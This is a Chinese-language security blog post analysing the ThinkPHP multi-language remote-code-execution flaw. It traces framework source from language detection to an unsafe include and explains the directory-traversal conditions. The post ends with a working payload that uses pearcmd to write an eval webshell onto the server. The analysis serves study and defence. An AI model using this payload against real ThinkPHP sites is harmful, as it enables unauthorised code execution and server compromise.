thinkphp多语言RCE原理分析

2024-03-29 994 0

thinkphp 多语言RCE

本次复现不像传统漏洞复现以正向流程进行漏洞复现,而是以发现漏洞利用点后,如何调用漏洞利用点进行反向调用漏洞流程 ,让初学者学习如何挖掘漏洞。

环境准备

composer create-project topthink/think tp 6.0.1
  1. 清理 Composer 缓存:运行以下命令清理 Composer 缓存,以确保使用最新的依赖关系信息:

    composer clear-cache
  2. 删除vendor目录和composer.lock文件:删除vendor目录和composer.lock文件,然后重新运行composer install

    rm -rf vendor
    composer install
  3. 手动编辑composer.lock文件:如果上述步骤未能解决问题,你可以尝试手动编辑composer.lock文件,将"topthink/framework"的版本更改为"v6.0.1"。请注意,手动编辑composer.lock文件可能会引入其他问题,所以请小心操作。

    打开composer.lock文件,找到"topthink/framework"的部分,将版本更改为"v6.0.1",然后保存文件。

  4. 运行composer update运行composer update命令,以确保composer.lock文件中的版本与composer.json文件中的版本一致:

    composer update

影响范围

Thinkphp,v6.0.1~v6.0.13,v5.0.x,v5.1.x

漏洞描述

如果 Thinkphp 程序开启了多语言功能,那就可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。

Thinkphp6开启多语言模式

目录:app/middleware.php

thinkphp多语言RCE原理分析插图

thinkphp5开启多语言模式

目录 application/config.php

'lang_switch_on'         => true

thinkphp多语言RCE原理分析插图1

多语言模式下的文件包含

寻找攻击链

漏洞触发点

Lang.php下的parse函数

protected function parse(string $file): array
{
$type = pathinfo($file, PATHINFO_EXTENSION);

switch ($type) {
case 'php':
$result = include $file; #任意文件包含
break;
case 'yml':
case 'yaml':
if (function_exists('yaml_parse_file')) {
$result = yaml_parse_file($file);
}
break;
}

return isset($result) && is_array($result) ? $result : [];
}

发现在Lang.php下load函数调用了它

public function load($file, $range = ''): array
{
$range = $range ?: $this->range;
if (!isset($this->lang[$range])) {
$this->lang[$range] = [];
}

$lang = [];

foreach ((array) $file as $_file) {
if (is_file($_file)) {
$result = $this->parse($_file);
$lang   = array_change_key_case($result) + $lang;
}
}

if (!empty($lang)) {
$this->lang[$range] = $lang + $this->lang[$range];
}

return $this->lang[$range];
}

全局搜索load的调用,连续两次Shift键

thinkphp多语言RCE原理分析插图2

LoadLangPack.php
public function handle($request, Closure $next)
{
// 自动侦测当前语言
$langset = $this->lang->detect($request);

if ($this->lang->defaultLangSet() != $langset) {
// 加载系统语言包
$this->lang->load([
$this->app->getThinkPath() . 'lang' . DIRECTORY_SEPARATOR . $langset . '.php',
]);

$this->app->LoadLangPack($langset);
}

$this->lang->saveToCookie($this->app->cookie);

return $next($request);
}

全局搜索handle却没发现任何有被调用的痕迹,这个时候如果是正常情况下已经断了。

但是LoadLangPack 这个类与多语言加载有关 midddleware.php中注释取消 环境会自动进行类加载

到此一个完整的攻击链完成 接着就是 构造合适的参数达到对文件包含的利用

构建攻击参数

开启多语言后 LoadLangPack.php默认加载的化

首先分析

$langset = $this->lang->detect($request);

进入Ctrl+B detect()

public function detect(Request $request): string
{
// 自动侦测设置获取语言选择
$langSet = '';

if ($request->get($this->config['detect_var'])) {
// url中设置了语言变量
$langSet = strtolower($request->get($this->config['detect_var']));
} elseif ($request->cookie($this->config['cookie_var'])) {
// Cookie中设置了语言变量
$langSet = strtolower($request->cookie($this->config['cookie_var']));
} elseif ($request->server('HTTP_ACCEPT_LANGUAGE')) {
// 自动侦测浏览器语言
$match = preg_match('/^([a-z\d\-]+)/i', $request->server('HTTP_ACCEPT_LANGUAGE'), $matches);
if ($match) {
$langSet = strtolower($matches[1]);
if (isset($this->config['accept_language'][$langSet])) {
$langSet = $this->config['accept_language'][$langSet];
}
}
}

if (empty($this->config['allow_lang_list']) || in_array($langSet, $this->config['allow_lang_list'])) {
// 合法的语言
$this->range = $langSet;
}

return $this->range;
}

进入第一个if

'detect_var'      => 'lang',

$this->config['detect_var']    ==  lang

也就是说我们 传递的参数是lang

$langSet = strtolower($request->get($this->config['detect_var']));

$request->get是thinkphp app/Request中的方法 这里不详细说明 我们可以理解为 把lang传递的数据小写赋值给$langSet

$this->config['allow_lang_list']默认是空

最后返回 lang传递的数据

进入load

$this->lang->load([
$this->app->getThinkPath() . 'lang' . DIRECTORY_SEPARATOR . $langset . '.php',
]);

$this->app->getThinkPath()默认的php安装路径

xxx\tp\vendor\topthink\framework\src\

默认

DIRECTORY_SEPARATOR='\'

xxx\tp\vendor\topthink\framework\src\lang\我们输入的数据.php

foreach ((array) $file as $_file) {
if (is_file($_file)) {
$result = $this->parse($_file);
$lang   = array_change_key_case($result) + $lang;
}
}

让$_file存在 利用../../../目录穿越 绕过if

进入parse()

protected function parse(string $file): array
{
$type = pathinfo($file, PATHINFO_EXTENSION);

switch ($type) {
case 'php':
$result = include $file;
break;
case 'yml':
case 'yaml':
if (function_exists('yaml_parse_file')) {
$result = yaml_parse_file($file);
}
break;
}

return isset($result) && is_array($result) ? $result : [];
}

$type就是php 它给加的默认后缀

pear 写入文件

https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp

利用条件

1)服务器上安装pear,也就是存在pearcmd.php。同时知道pearcmd.php的文件路径

2)web环境下在php.ini中register_argc_argv设置为On

3)存在文件包含,可以包含php文件并且没有open_basedir的限制

php的pear扩展是一个命令行扩展管理工具,默认的安装路径在/usr/local/lib/php/pearcmd.php,在命令行下可以用pearphp /usr/local/lib/php/pearcmd.php运行,虽然不是在web的目录下,但是如果存在文件包含漏洞,我们就可以运行这个命令行工具

我们再来看register_argc_argv选项,在这个选项字段如果选了ON的话,URL中?后面的内容会全部传入至$_SERVER['argv']这个变量内,无论后面的内容是否有等号。

docker 下的payload

lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=eval($_REQUEST[1]);?>+/tmp/eval.php

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

办事处网络安全监控与事件响应;国外员工终端安全性怎么保障 | FB甲方群话题讨论
拿不下总统之位,那就用热加载拿下验证码识别与爆破好了!
Sooty:一款SoC分析一体化与自动化CLI工具
shiro CVE-2016-6802 路径绕过(越权)
Apache Solr 身份验证绕过漏洞(CVE-2024-45216)详解
llama_index的CVE-2024-4181漏洞根因分析

发布评论